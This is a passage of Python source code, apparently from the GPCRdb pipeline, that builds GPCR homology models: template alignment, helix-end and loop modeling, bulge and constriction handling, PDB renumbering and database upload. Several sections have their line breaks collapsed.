                            db_res = Residue.objects.get(protein_conformation__protein=Homology_model.reference_protein.parent,
                                                         sequence_number=int(res.get_id()[1]))
                        if PDB.Polypeptide.three_to_one(res.get_resname())!=db_res.amino_acid:
                            residue_shift = True
                            break
                    except:
                        pass
            if residue_shift==True:
                if self.debug:
                    print('Residue shift in model {} at {}'.format(Homology_model.reference_entry_name, db_res))
                logger.warning('Residue shift in model {} at 
{}'.format(Homology_model.reference_entry_name, db_res)) raise ValueError('Error: Residue shift in model {} at {}'.format(Homology_model.reference_entry_name, db_res)) # Check for clashes in model if len(hse.clash_pairs)>0: if self.debug: print('Remaining clashes in {}:'.format(Homology_model.reference_entry_name)) for i in hse.clash_pairs: if self.debug: print(i) if i[0][1]==i[1][1]-1 or i[0][1]==i[1][1]: hse.clash_pairs.remove(i) logger.warning('Remaining clashes in {}\n{}'.format(Homology_model.reference_entry_name,hse.clash_pairs)) # Check for chain breaks in model if len(hse.chain_breaks)>0: if self.debug: print('Chain breaks in {}:'.format(Homology_model.reference_entry_name)) for j in hse.chain_breaks: print(j) logger.warning('Chain breaks in {}\n{}'.format(Homology_model.reference_entry_name,hse.chain_breaks)) ##### Resume output ##### if not self.debug: sys.stdout = _stdout sys.stdout.close() # Upload to db if self.update and not residue_shift: Homology_model.upload_to_db(formatted_model) # logger.info('{} ({}) homology model uploaded to db'.format(Homology_model.reference_entry_name,state)) if self.debug: print('{} homology model uploaded to db'.format(Homology_model.reference_entry_name)) with open('./structure/homology_models/done_models.txt','a') as f: f.write(receptor+'\n') except Exception as msg: try: exc_type, exc_obj, exc_tb = sys.exc_info() if self.debug: print('Error on line {}: Failed to build model {} (main structure: {})\n{}'.format(exc_tb.tb_lineno, receptor, Homology_model.main_structure,msg)) print(''.join(traceback.format_tb(exc_tb))) logger.error('Failed to build model {} {}\n {}'.format(receptor, state, msg)) t = tests.HomologyModelsTests() if 'Number of residues in the alignment and pdb files are different' in str(msg): t.pdb_alignment_mismatch(Homology_model.alignment, Homology_model.main_pdb_array, Homology_model.main_structure) elif 'No such residue:' in str(msg): if self.debug: t.pdb_pir_mismatch(Homology_model.main_pdb_array, Homology_model.model_sequence) with open('./structure/homology_models/done_models.txt','a') as f: f.write(receptor+'\n') except: try: Protein.objects.get(entry_name=receptor) except: logger.error('Invalid receptor name: {}'.format(receptor)) print('Invalid receptor name: {}'.format(receptor)) class HomologyModeling(object): ''' Class to build homology models for GPCRs. 
@param reference_entry_name: str, protein entry name \n
        @param state: str, endogenous ligand state of reference \n
        @param query_states: list, list of endogenous ligand states to be applied for template search \n
        @param iterations: int, number of MODELLER iterations
    '''
    segment_coding = {1:'TM1',2:'TM2',3:'TM3',4:'TM4',5:'TM5',6:'TM6',7:'TM7',8:'H8',
                      12:'ICL1', 23:'ECL1', 34:'ICL2', 45:'ECL2'}

    def __init__(self, reference_entry_name, state, query_states, iterations=1, complex_model=False,
                 signprot=False, debug=False):
        self.debug = debug
        self.complex = complex_model
        self.signprot = signprot
        self.version = build_date
        self.reference_entry_name = reference_entry_name.lower()
        self.state = state
        self.query_states = query_states
        self.modeller_iterations = iterations
        self.statistics = CreateStatistics(self.reference_entry_name)
        self.reference_protein = Protein.objects.get(entry_name=self.reference_entry_name)
        self.reference_class = self.reference_protein.family.parent.parent.parent
        self.segments = []
        self.similarity_table = OrderedDict()
        self.similarity_table_all = OrderedDict()
        self.similarity_table_other_states = OrderedDict()
        self.main_structure = None
        self.signprot_complex = None
        self.main_template_preferred_chain = ''
        self.loop_template_table = OrderedDict()
        self.loops = OrderedDict()
        self.changes_on_db = []
        # A 4-character entry name is a PDB code, i.e. a crystal-structure refinement run
        if len(self.reference_entry_name)==4:
            self.prot_conf = ProteinConformation.objects.get(protein=self.reference_protein.parent)
            self.uniprot_id = self.reference_protein.parent.accession
            self.revise_xtal = True
        else:
            self.prot_conf = ProteinConformation.objects.get(protein=self.reference_protein)
            self.uniprot_id = self.reference_protein.accession
            self.revise_xtal = False
        class_tree = {'001':'A', '002':'B1', '003':'B2', '004':'C', '005':'F', '006':'T'}
        self.class_name = 'Class'+class_tree[Protein.objects.get(entry_name=self.reference_entry_name).family.parent.slug[:3]]
        self.statistics.add_info('uniprot_id',self.uniprot_id)
        self.statistics.add_info('state',self.state)
        self.template_source = OrderedDict()
        self.helix_end_mods = None
        self.alignment = OrderedDict()
        self.main_pdb_array = OrderedDict()
        self.disulfide_pairs = []
        for r in Residue.objects.filter(protein_conformation=self.prot_conf):
            if r.protein_segment.slug not in self.template_source:
                self.template_source[r.protein_segment.slug] = OrderedDict()
            try:
                self.template_source[r.protein_segment.slug][ggn(r.display_generic_number.label)] = [None,None]
            except:
                self.template_source[r.protein_segment.slug][str(r.sequence_number)] = [None,None]

    def __repr__(self):
        return "<Hommod: {}, {}>".format(self.reference_entry_name, self.state)

    def upload_to_db(self, formatted_model):
        ''' Upload the model to StructureModel and upload segment and rotamer info to StructureModelStatsSegment
            and StructureModelStatsRotamer.
''' s_state=ProteinState.objects.get(name=self.state) new_entry = False # Refined xtal if self.revise_xtal!=False: try: hommod = Structure.objects.get(pdb_code__index=self.reference_entry_name.upper()+'_refined', refined=True) hommod.pdb_data.pdb = formatted_model hommod.pdb_data.save() original = Structure.objects.get(pdb_code__index=self.reference_entry_name.upper()) # Delete previous data StructureRefinedStatsRotamer.objects.filter(structure=hommod).delete() StructureRefinedSeqSim.objects.filter(structure=hommod).delete() except: original = Structure.objects.get(pdb_code__index=self.reference_entry_name.upper()) wl = WebLink.objects.create(index=self.reference_entry_name.upper()+'_refined', web_resource=original.pdb_code.web_resource) pdb = PdbData.objects.create(pdb=formatted_model) hommod = Structure.objects.create(preferred_chain=original.preferred_chain, resolution=original.resolution, publication_date=original.publication_date, representative=original.representative, annotated=original.annotated, distance=original.distance, pdb_code=wl, pdb_data=pdb, protein_conformation=self.prot_conf, publication=original.publication, state=original.state, structure_type=original.structure_type, refined=True) for r in self.template_stats: # if r[0] in ['N-term', 'C-term']: # continue res = Residue.objects.get(protein_conformation__protein=self.reference_protein.parent, sequence_number=r[1]) rots = StructureRefinedStatsRotamer.objects.create(structure=hommod, residue=res, backbone_template=r[4], rotamer_template=r[5]) for struct, sim in self.similarity_table_all.items(): if struct in self.template_list: db_seqsim = StructureRefinedSeqSim.objects.create(structure=hommod, template=struct, similarity=sim) # Homology model else: try: hommod = StructureModel.objects.get(protein=self.reference_protein, state=s_state) hommod.main_template = self.main_structure hommod.pdb = formatted_model hommod.version = self.version hommod.save() # Delete previous data StructureModelStatsRotamer.objects.filter(homology_model=hommod).delete() StructureModelSeqSim.objects.filter(homology_model=hommod).delete() except Exception as msg: hommod = StructureModel.objects.create(protein=self.reference_protein, state=s_state, main_template=self.main_structure, pdb=formatted_model, version=self.version) for r in self.template_stats: # if r[0] in ['N-term', 'C-term']: # continue res = Residue.objects.get(protein_conformation__protein=self.reference_protein, sequence_number=r[1]) rots = StructureModelStatsRotamer.objects.create(homology_model=hommod, residue=res, backbone_template=r[4],rotamer_template=r[5]) for struct, sim in self.similarity_table_all.items(): if struct in self.template_list: db_seqsim = StructureModelSeqSim.objects.create(homology_model=hommod, template=struct, similarity=sim) def right_rotamer_select(self, rotamer): ''' Filter out compound rotamers. ''' if len(rotamer)>1: for i in rotamer: if i.pdbdata.pdb.startswith('COMPND')==False: rotamer = i break else: rotamer=rotamer[0] return rotamer def format_final_model(self): ''' Do final formatting on homology model pdb file. Adds REMARK line, correct residue numbering and class-specific generic numbers. Returns the pdb in string format. 
''' # if self.prot_conf.protein!=self.main_structure.protein_conformation.protein.parent: # try: # del self.template_source['N-term'] # except: # pass # try: # del self.template_source['C-term'] # except: # pass pos_list = [] if self.complex: first_signprot_res = False for seg in self.template_source: for num in self.template_source[seg]: try: num = str(Residue.objects.get(protein_conformation=self.prot_conf, display_generic_number__label=dgn(num,self.prot_conf)).sequence_number) except: if self.complex: try: num = str(Residue.objects.get(protein_conformation=self.signprot_protconf, display_generic_number__label=num).sequence_number) if not first_signprot_res: first_signprot_res = num except: pass pos_list.append(num) i = 0 path = './structure/homology_models/' if self.revise_xtal==False: modelname = '{}_{}_{}_{}_GPCRdb'.format(self.class_name, self.reference_entry_name, self.state, self.main_structure) else: modelname = "{}_{}_{}_refined_{}_GPCRdb".format(self.class_name, self.reference_protein.parent.entry_name, self.main_structure, self.main_structure.state.name) with open (path+modelname+'.pdb', 'r+') as f: pdblines = f.readlines() out_list = [] prev_num = None first_hetatm = False water_count = 0 # first_signprot_res_found = False for line in pdblines: try: if prev_num==None: pdb_re = re.search('(ATOM[A-Z\s\d]{13}\S{3})([\sAB]+)(\d+)([A-Z\s\d.-]{49,53})',line) prev_num = int(pdb_re.group(3)) pdb_re = re.search('(ATOM[A-Z\s\d]{13}\S{3})([\sAB]+)(\d+)([A-Z\s\d.-]{49,53})',line) if int(pdb_re.group(3))>prev_num: i+=1 prev_num = int(pdb_re.group(3)) whitespace = len(pdb_re.group(2)) if len(pos_list[i])-len(pdb_re.group(3))==0: whitespace = whitespace*' ' elif len(pos_list[i])-len(pdb_re.group(3))==1: whitespace = (whitespace-1)*' ' elif len(pos_list[i])-len(pdb_re.group(3))==2: whitespace = (whitespace-2)*' ' elif len(pos_list[i])-len(pdb_re.group(3))==-1: whitespace = (whitespace+1)*' ' elif len(pos_list[i])-len(pdb_re.group(3))==-2: whitespace = (whitespace+2)*' ' else: whitespace = (whitespace-3)*' ' group1 = pdb_re.group(1) if self.complex: if i<pos_list.index(first_signprot_res): # if first_signprot_res_found==False: # out_list.append('TER\n') # first_signprot_res_found = True if len(whitespace)==2: whitespace = whitespace[0]+'R' else: whitespace = whitespace[0]+'R'+whitespace[2:] else: if len(whitespace)==2: whitespace = whitespace[0]+'A' else: whitespace = whitespace[0]+'A'+whitespace[2:] out_line = group1+whitespace+pos_list[i]+pdb_re.group(4) out_list.append(out_line) except: try: if line.startswith('TER'): pdb_re = re.search('(TER\s+\d+\s+\S{3})([\sAB]+)(\d+)',line) out_list.append(pdb_re.group(1)+len(pdb_re.group(2))*' '+pos_list[i]+"\n") atom_num+=1 else: raise Exception() except: try: pref_chain = str(self.main_structure.preferred_chain) if len(pref_chain)>1: pref_chain = pref_chain[0] pdb_re = re.search('(HETATM[0-9\sA-Z{apo}]{{11}})([A-Z0-9\s]{{3}})([\sAB]+)(\d+)([\s0-9.A-Z-]+)'.format(apo="'"),line) alternate_water = False whitespace3 = len(pdb_re.group(3))*' ' if first_hetatm==False: prev_hetnum = int(pdb_re.group(4)) first_hetatm = True atom_num = int(pdb_re.group(1)[7:11]) num = int(pos_list[i])+1 if 'HOH' in pdb_re.group(2): water_count+=1 if water_count in self.alternate_water_positions: if len(str(num))==3: whitespace1 = ' ' whitespace2 = 5*' ' else: whitespace1 = '' whitespace2 = 4*' ' bwater = 'HETATM {} O BHOH {}{}{}'.format(str(atom_num+1), whitespace1, num+1, whitespace2)+self.alternate_water_positions[water_count][31:] alternate_water = True if 
alternate_water==True: out_list.append(pdb_re.group(1)[:7]+str(atom_num)+pdb_re.group(1)[11:-1]+'A'+pdb_re.group(2)+whitespace3+str(int(pos_list[i])+1)+pdb_re.group(5)) out_list.append(bwater) atom_num+=2 else: out_list.append(pdb_re.group(1)[:7]+str(atom_num)+pdb_re.group(1)[11:]+pdb_re.group(2)+whitespace3+str(int(pos_list[i])+1)+pdb_re.group(5)) atom_num+=1 else: if int(pdb_re.group(4))!=prev_hetnum: if 'HOH' in pdb_re.group(2): water_count+=1 if water_count in self.alternate_water_positions: if len(str(num))==3: whitespace1 = ' ' whitespace2 = 5*' ' else: whitespace1 = '' whitespace2 = 4*' ' bwater = 'HETATM {} O BHOH {}{}{}'.format(str(atom_num+1), whitespace1, num+1, whitespace2)+self.alternate_water_positions[water_count][31:] alternate_water = True if alternate_water==True: out_list.append(pdb_re.group(1)[:7]+str(atom_num)+pdb_re.group(1)[11:-1]+'A'+pdb_re.group(2)+whitespace3+str(num+1)+pdb_re.group(5)) out_list.append(bwater) atom_num+=2 else: out_list.append(pdb_re.group(1)[:7]+str(atom_num)+pdb_re.group(1)[11:]+pdb_re.group(2)+whitespace3+str(num+1)+pdb_re.group(5)) atom_num+=1 prev_hetnum+=1 num+=1 else: out_list.append(pdb_re.group(1)+pdb_re.group(2)+whitespace3+str(num)+pdb_re.group(5)) atom_num+=1 except: out_list.append(line) with open (path+modelname+'.pdb', 'w') as f: f.write(''.join(out_list)) # pdb_struct = PDB.PDBParser(QUIET=True).get_structure('model', path+modelname+'.pdb')[0] with open (path+modelname+'.pdb', 'r') as f: pdb_struct = f.read() pdb_struct = StringIO(pdb_struct) assign_gn = as_gn.GenericNumbering(pdb_file=pdb_struct, sequence_parser=True) pdb_struct = assign_gn.assign_generic_numbers_with_sequence_parser() io = PDB.PDBIO() io.set_structure(pdb_struct) io.save(path+modelname+'.pdb') with open (path+modelname+'.pdb', 'r+') as f: content = f.read() first_line = 'REMARK 1 MODEL FOR {} CREATED WITH GPCRDB HOMOLOGY MODELING PIPELINE, VERSION {}\n'.format(self.reference_entry_name, build_date) second_line = 'REMARK 2 MAIN TEMPLATE: {}\n'.format(self.main_structure) f.seek(0,0) f.write(first_line+second_line+content) return first_line+second_line+content def update_template_source(self, keys, struct, segment, just_rot=False): ''' Update the template_source dictionary with structure info for backbone and rotamers. ''' for k in keys: if just_rot==True: try: self.template_source[segment][k][1] = struct except: pass else: try: self.template_source[segment][k][0] = struct except: pass def run_alignment(self, query_states, core_alignment=True, segments=['TM1','ICL1','TM2','ECL1','TM3','ICL2','TM4','TM5','TM6','TM7','H8'], order_by='similarity'): ''' Creates pairwise alignment between reference and target receptor(s). Returns Alignment object. 
@param core_alignment: boolean, False if only create core alignment (no loops) @param query_states: list, list of endogenous ligand states to be applied for template search @param segments: list, list of segments to use, e.g.: ['TM1','ICL1','TM2','ECL1'] \n @param order_by: str, order results by identity, similarity or simscore ''' alignment = AlignedReferenceTemplate() alignment.run_hommod_alignment(self.reference_protein, segments, query_states, order_by, complex_model=self.complex) main_pdb_array = OrderedDict() if core_alignment==True: if self.debug: print('Alignment: ',datetime.now() - startTime) self.changes_on_db = alignment.changes_on_db alignment.enhance_alignment(alignment.reference_protein, alignment.main_template_protein) if self.debug: print('Enhanced alignment: ',datetime.now() - startTime) self.segments = segments self.main_structure = alignment.main_template_structure if self.debug: print('Main structure: {}'.format(self.main_structure)) self.similarity_table = alignment.similarity_table self.similarity_table_all = self.run_alignment(["Inactive","Intermediate","Active"], core_alignment=False)[0].similarity_table for i,j in self.similarity_table_all.items(): if i not in self.similarity_table: self.similarity_table_other_states[i] = j self.main_template_preferred_chain = str(self.main_structure.preferred_chain)[0] self.statistics.add_info("main_template", self.main_structure) self.statistics.add_info("preferred_chain", self.main_template_preferred_chain) parse = GPCRDBParsingPDB() main_pdb_array = parse.pdb_array_creator(structure=self.main_structure) if self.main_structure.pdb_code.index=='4OR2': main_pdb_array['H8'] = OrderedDict() try: if len(alignment.reference_dict['H8'])==0: del alignment.reference_dict['H8'] del alignment.template_dict['H8'] del alignment.alignment_dict['H8'] del main_pdb_array['H8'] except: pass for seg_l, seg in main_pdb_array.items(): for gn, res in seg.items(): self.update_template_source([gn.replace('.','x')],self.main_structure,seg_l) helixends = HelixEndsModeling(self.similarity_table_all, self.template_source, self.main_structure) try: if (len(main_pdb_array['H8'])==0 and len(list(Residue.objects.filter(protein_conformation=self.prot_conf, protein_segment__slug='H8')))>0 or (self.reference_protein.family.slug.startswith('004') and self.main_structure.pdb_code.index!='4OO9') or (self.main_structure.pdb_code.index in ['5UNF','5UNG','5UNH','5O9H'] and self.revise_xtal==False)): if self.main_structure.pdb_code.index=='5O9H' and self.reference_entry_name in ['c5ar2_human','c3ar_human']: raise AssertionError helixends.correct_helix_ends(self.main_structure, main_pdb_array, alignment, self.template_source, separate_H8=True) main_pdb_array = helixends.main_pdb_array alignment = helixends.alignment self.template_source = helixends.template_source self.helix_end_mods = helixends.helix_end_mods if self.reference_protein.family.slug.startswith('004'): struct = Structure.objects.get(pdb_code__index='4OO9') alt_simtable = self.similarity_table_all alt_simtable[struct] = 0 gn_list = list(Residue.objects.filter(protein_conformation=struct.protein_conformation, protein_segment__slug='H8')) else: alt_simtable = self.similarity_table_all for struct in alt_simtable: if struct.pdb_code.index in ['5UNF','5UNG','5UNH','5O9H']: continue try: gn_list = list(Residue.objects.filter(protein_conformation=struct.protein_conformation, protein_segment__slug='H8')) if len(gn_list)>0: break except: pass for i in alignment.ordered_proteins: if 
i.protein.entry_name==struct.protein_conformation.protein.parent.entry_name: break H8_alignment = AlignedReferenceTemplate() H8_alignment.enhance_alignment(alignment.ordered_proteins[0],i) ######### temporary reference_dict, template_dict, alignment_dict = OrderedDict(),OrderedDict(),OrderedDict() for i,j,k in zip(H8_alignment.reference_dict['H8'],H8_alignment.template_dict['H8'],H8_alignment.alignment_dict['H8']): if i in self.template_source['H8']: reference_dict[i] = H8_alignment.reference_dict['H8'][i] template_dict[i] = H8_alignment.template_dict['H8'][i] alignment_dict[i] = H8_alignment.alignment_dict['H8'][i] ################### ######### change values alignment.reference_dict['H8'] = reference_dict alignment.template_dict['H8'] = template_dict alignment.alignment_dict['H8'] = alignment_dict ####################### gn_num_list = [ggn(i.display_generic_number.label) for i in gn_list if i.display_generic_number!=None] found_match = False c1 = -4 c2 = None while found_match==False: refs = list(main_pdb_array['TM7'].keys())[c1:c2] try: for gn in refs: Residue.objects.get(protein_conformation=struct.protein_conformation, display_generic_number__label=dgn(gn.replace('.','x'),struct.protein_conformation)) found_match=True except: c1-=1 if c2==None: c2 = -1 else: c2-=1 if c1<-10: break refs = [i.replace('.','x') for i in refs] H8_reference = parse.fetch_residues_from_array(main_pdb_array['TM7'], refs) H8_template = parse.fetch_residues_from_pdb(struct, refs+gn_num_list) superpose = sp.OneSidedSuperpose(H8_reference,H8_template,4,1) sup_residues = superpose.run() H8_array = OrderedDict() for i,j in alignment.template_dict['H8'].items(): if j not in ['-','x']: try: H8_array[i.replace('x','.')] = sup_residues[i.replace('x','.')] except: H8_array[i.replace('x','.')] = 'x' else: H8_array[i.replace('x','.')] = 'x' main_pdb_array['H8'] = H8_array for gn, res in main_pdb_array['H8'].items(): try: if gn.replace('.','x') in gn_num_list: self.update_template_source([gn.replace('.','x')],struct,'H8') except: pass helixends.correct_helix_ends(self.main_structure, main_pdb_array, alignment, self.template_source, separate_H8=False) self.helix_end_mods['added']['H8'] = helixends.helix_end_mods['added']['H8'] self.helix_end_mods['removed']['H8'] = helixends.helix_end_mods['removed']['H8'] self.template_source = helixends.template_source else: raise Exception() except: if len(list(Residue.objects.filter(protein_conformation=self.prot_conf, protein_segment__slug='H8')))==0: sep_H8 = True else: sep_H8 = None helixends.correct_helix_ends(self.main_structure, main_pdb_array, alignment, self.template_source, separate_H8=sep_H8) self.helix_end_mods = helixends.helix_end_mods self.template_source = helixends.template_source self.statistics.add_info('helix_end_mods',self.helix_end_mods) if self.debug: print('Corrected helix ends: ',datetime.now() - startTime) main_pdb_array = helixends.main_pdb_array alignment = helixends.alignment loops_in_ref = [i for i in list(self.template_source) if i[0] not in ['N','C','T','H']] for loop in loops_in_ref: loop_alignment = AlignedReferenceTemplate() loop_alignment.run_hommod_alignment(self.reference_protein, [loop], ['Inactive','Intermediate','Active'], order_by='similarity', provide_main_template_structure=self.main_structure, provide_similarity_table=self.similarity_table_all, main_pdb_array=main_pdb_array, provide_alignment=alignment, complex_model=self.complex) self.loop_template_table[loop] = loop_alignment.loop_table try: if loop in list(alignment.alignment_dict.keys()) 
and self.main_structure in loop_alignment.loop_table:
                    temp_loop_table = OrderedDict([('aligned',100)])
                    try:
                        for lab, val in loop_alignment.loop_table.items():
                            temp_loop_table[lab] = val
                        self.loop_template_table[loop] = temp_loop_table
                    except:
                        pass
            except:
                pass
        self.statistics.add_info('similarity_table', self.similarity_table)
        self.statistics.add_info('loops',self.loop_template_table)
        if self.debug:
            print('Loop alignment: ',datetime.now() - startTime)
        return alignment, main_pdb_array

    def build_homology_model(self, ref_temp_alignment, switch_bulges=True, switch_constrictions=True, loops=True,
                             switch_rotamers=True, N_and_C_termini=True):
        ''' Function to identify and switch non-conserved residues in the alignment. Optionally, it can identify and
            switch bulge and constriction sites too.

            @param ref_temp_alignment: AlignedReferenceAndTemplate, alignment of reference and main template with
            alignment string. \n
            @param switch_bulges: boolean, identify and switch bulge sites. Default = True.
            @param switch_constrictions: boolean, identify and switch constriction sites. Default = True.
            @param loops: boolean, set it to True if you want loop modeling. Default = True.
            @param switch_rotamers: boolean, set it to True if you want alternative rotamer templates. Default = True.
            @param N_and_C_termini: boolean, set it to True if you want to model N/C-termini. Only applies for
            refining crystals. Default = True.
        '''
        a = ref_temp_alignment[0]
        main_pdb_array = ref_temp_alignment[1]
        ref_bulge_list, temp_bulge_list, ref_const_list, temp_const_list = [],[],[],[]
        parse = GPCRDBParsingPDB()

        # Delete H8 from dictionaries if it's not present in reference (e.g. gnrhr_human)
        if self.revise_xtal:
            del_H8_prot = self.reference_protein.parent
        else:
            del_H8_prot = self.reference_protein
        if len(Residue.objects.filter(protein_conformation__protein=del_H8_prot, protein_segment__slug='H8'))==0:
            del a.reference_dict['H8']
            del a.template_dict['H8']
            del a.alignment_dict['H8']
            del main_pdb_array['H8']

        trimmed_residues=[]
        # loops
        if loops==True:
            c3x25 = {'001':'3x25','002':'3x29','003':'3x29','004':'3x29','005':'3x25'}
            model_loops = []
            loop_stat = OrderedDict()
            for label, structures in self.loop_template_table.items():
                if label in ['ICL1','ECL1','ICL2']:
                    x50_present = False
                    l_gns = list(Residue.objects.filter(protein_conformation=self.prot_conf, protein_segment__slug=label))
                    for i in l_gns:
                        try:
                            if 'x50' in i.display_generic_number.label:
                                structures = self.similarity_table_all
                                x50_present = True
                                break
                        except:
                            pass
                loop = Loops(self.reference_protein, label, structures, self.main_structure, self.helix_end_mods,
                             list(self.template_source), self.revise_xtal)
                loop_template = loop.fetch_loop_residues(main_pdb_array)

                if (loop.loop_output_structure not in [self.main_structure,None] and
                        label in ['ICL1','ECL1','ICL2'] and x50_present==True):
                    al = AlignedReferenceTemplate()
                    t = al.run_hommod_alignment(self.reference_protein, [label], ['Inactive','Intermediate','Active'],
                                                order_by='similarity',
                                                only_output_alignment=loop.loop_output_structure.protein_conformation.protein.parent)
                    al.enhance_alignment(t[0],t[1])
                    a.reference_dict[label] = al.reference_dict[label]
                    a.template_dict[label] = al.template_dict[label]
                    a.alignment_dict[label] = al.alignment_dict[label]
                if label=='ECL2' and (loop.partialECL2_1==True or loop.partialECL2_2==True):
                    al = AlignedReferenceTemplate()
                    t = al.run_hommod_alignment(self.reference_protein, [label], ['Inactive','Intermediate','Active'],
                                                order_by='similarity', 
only_output_alignment=loop.loop_output_structure[1].protein_conformation.protein.parent) al.enhance_alignment(t[0],t[1],keep_all=True) a.reference_dict[label] = al.reference_dict[label] a.template_dict[label] = al.template_dict[label] a.alignment_dict[label] = al.alignment_dict[label] if type(loop.loop_output_structure)!=type([]): loop_insertion = loop.insert_loop_to_arrays(loop.loop_output_structure, main_pdb_array, loop_template, a.reference_dict, a.template_dict, a.alignment_dict) else: loop_insertion = loop.insert_ECL2_to_arrays(loop.loop_output_structure, main_pdb_array, loop_template, a.reference_dict, a.template_dict, a.alignment_dict, loop.partialECL2_1, loop.partialECL2_2) if loop.model_loop==True and loop.new_label!=None: model_loops.append(loop.new_label) main_pdb_array = loop_insertion.main_pdb_array a.reference_dict = loop_insertion.reference_dict a.template_dict = loop_insertion.template_dict a.alignment_dict = loop_insertion.alignment_dict # update template_source with backbone template of loop if loop.new_label!=None: change_i, change_template_list = [], [] loop_stat[loop.new_label] = loop.loop_output_structure ref_loop_ids = a.reference_dict[loop.new_label] c = 0 for i, v in ref_loop_ids.items(): if v!='x': if '?' not in i: change_i.append(c) c+=1 for i, v in enumerate(list(self.template_source[label])): if i in change_i: change_template_list.append(v) self.update_template_source(change_template_list,loop.loop_output_structure,label) else: loop_stat[label] = loop.loop_output_structure if label=='ECL2' and loop.loop_output_structure!=None: change_i1, change_i2, change_i3, change_templates1, change_templates2, change_templates3 = [],[],[],[],[],[] x50 = list(self.template_source[label].keys()).index('45x50') c = 0 for i, v in a.reference_dict[label].items(): if v!='x': if '?' 
not in i: if c<x50: change_i1.append(c) elif x50<=c<x50+3: change_i2.append(c) elif x50+2<c: change_i3.append(c) c+=1 for i, v in enumerate(list(self.template_source[label])): if i in change_i1: change_templates1.append(v) elif i in change_i2: change_templates2.append(v) elif i in change_i3: change_templates3.append(v) self.update_template_source(change_templates1,loop.loop_output_structure[0],label) self.update_template_source(change_templates2,loop.loop_output_structure[1],label) self.update_template_source(change_templates3,loop.loop_output_structure[2],label) add_ECL2_disulfide = True # if chain break in ECL2_2 is predicted, let MODELLER optimize conserved middle part, while keeping disulfide bridge if label=='ECL2' and loop.evade_chain_break: trimmed_residues+=['45.50','45.51','45.52'] add_ECL2_disulfide = True # add 3x25-45x50 disulfide bond if label=='ECL2' and add_ECL2_disulfide: if loop.loop_output_structure[1]!=self.main_structure: self.reference_class self.disulfide_pairs.append([c3x25[self.reference_class.slug[:3]],'45x50']) else: self.disulfide_pairs.append([0,0]) self.statistics.add_info('loops', loop_stat) self.loops = loop_stat if self.debug: print(loop_stat) print('Integrate loops: ',datetime.now() - startTime) # bulges and constrictions if switch_bulges==True or switch_constrictions==True: delete_r = set() delete_t = set() delete_a = set() ref_seg_keys = list(a.reference_dict.keys()) temp_seg_keys = list(a.template_dict.keys()) aligned_seg_keys = list(a.alignment_dict.keys()) for ref_seg, temp_seg, aligned_seg in zip(ref_seg_keys, temp_seg_keys, aligned_seg_keys): if ref_seg[0]=='T': ref_res_keys = list(a.reference_dict[ref_seg].keys()) temp_res_keys = list(a.template_dict[temp_seg].keys()) aligned_res_keys = list(a.alignment_dict[aligned_seg].keys()) for ref_res, temp_res, aligned_res in zip(ref_res_keys, temp_res_keys, aligned_res_keys): gn = ref_res gn_num = parse.gn_num_extract(gn, 'x')[1] if a.alignment_dict[aligned_seg][aligned_res]=='-': if (a.reference_dict[ref_seg][ref_res]=='-' and a.reference_dict[ref_seg][parse.gn_indecer(gn,'x',-1)] not in ['-','/'] and a.reference_dict[ref_seg][parse.gn_indecer(gn,'x',+1)] not in ['-','/']): # bulge in template if len(str(gn_num))==3: if switch_bulges==True: try: Bulge = Bulges(gn) bulge_template = Bulge.find_bulge_template(self.similarity_table_all, bulge_in_reference=False) l = list(main_pdb_array[temp_seg].keys()) this = l.index(gn.replace('x','.')) bulge_site = OrderedDict([(l[this-2],main_pdb_array[ref_seg][l[this-2]]), (l[this-1],main_pdb_array[ref_seg][l[this-1]]), (l[this],main_pdb_array[ref_seg][l[this]]), (l[this+1],main_pdb_array[ref_seg][l[this+1]]), (l[this+2],main_pdb_array[ref_seg][l[this+2]])]) superpose = sp.BulgeConstrictionSuperpose(bulge_site, bulge_template) new_residues = superpose.run() switch_res = 0 for gen_num, atoms in bulge_template.items(): if switch_res!=0 and switch_res!=3: gn__ = gen_num.replace('.','x') self.update_template_source([gn__],Bulge.template,ref_seg) main_pdb_array[ref_seg][gen_num] = new_residues[gen_num] a.template_dict[temp_seg][gn__] = PDB.Polypeptide.three_to_one( atoms[0].get_parent().get_resname()) if a.template_dict[temp_seg][gn__]==a.reference_dict[ref_seg][gn__]: a.alignment_dict[aligned_seg][gn__]=a.template_dict[temp_seg][gn__] else: a.alignment_dict[aligned_seg][gn__]='.' 
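                                            # Note (descriptive comment, added): in this template-bulge branch the
                                            # superposed alternative template spans four residues (switch_res 0-3);
                                            # the guard above keeps the two flanking anchor residues from the main
                                            # template and only swaps in the two middle positions from the
                                            # bulge-free alternative template.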
switch_res+=1 del main_pdb_array[ref_seg][gn.replace('x','.')] delete_r.add((ref_seg,gn)) delete_t.add((temp_seg,gn)) delete_a.add((aligned_seg,gn)) temp_bulge_list.append({gn:Bulge.template}) except: temp_bulge_list.append({gn:None}) # constriction in reference else: if switch_constrictions==True: try: Const = Constrictions(gn) constriction_template = Const.find_constriction_template( self.similarity_table_all, constriction_in_reference=True) constriction_site = OrderedDict([ (parse.gn_indecer(gn,'x',-2).replace('x','.'), main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',-2).replace('x','.')]), (parse.gn_indecer(gn,'x',-1).replace('x','.'), main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',-1).replace('x','.')]), (gn.replace('x','.'), main_pdb_array[ref_seg][gn.replace('x','.')]), (parse.gn_indecer(gn,'x',+1).replace('x','.'), main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',+1).replace('x','.')]), (parse.gn_indecer(gn,'x',+2).replace('x','.'), main_pdb_array[ref_seg][parse.gn_indecer(gn,'x',+2).replace('x','.')])]) superpose = sp.BulgeConstrictionSuperpose(constriction_site, constriction_template) new_residues = superpose.run() switch_res = 0 for gen_num, atoms in constriction_template.items(): if switch_res!=0 and switch_res!=3: gn__ = gen_num.replace('.','x') self.update_template_source([gn__],Const.template,ref_seg) main_pdb_array[ref_seg][gen_num] = new_residues[gen_num] a.template_dict[gn__] = PDB.Polypeptide.three_to_one( atoms[0].get_parent().get_resname()) if a.template_dict[temp_seg][gn__]==a.reference_dict[ref_seg][gn__]: a.alignment_dict[aligned_seg][gn__]=a.template_dict[temp_seg][gn__] switch_res+=1 ref_const_list.append({gn:Const.template}) del main_pdb_array[ref_seg][gn.replace('x','.')] delete_r.add((ref_seg,gn)) delete_t.add((temp_seg,gn)) delete_a.add((aligned_seg,gn)) except: ref_const_list.append({gn:None}) elif (a.template_dict[ref_seg][temp_res]=='-' and a.template_dict[temp_seg][parse.gn_indecer(gn,'x',-1)] not in ['-','/'] and 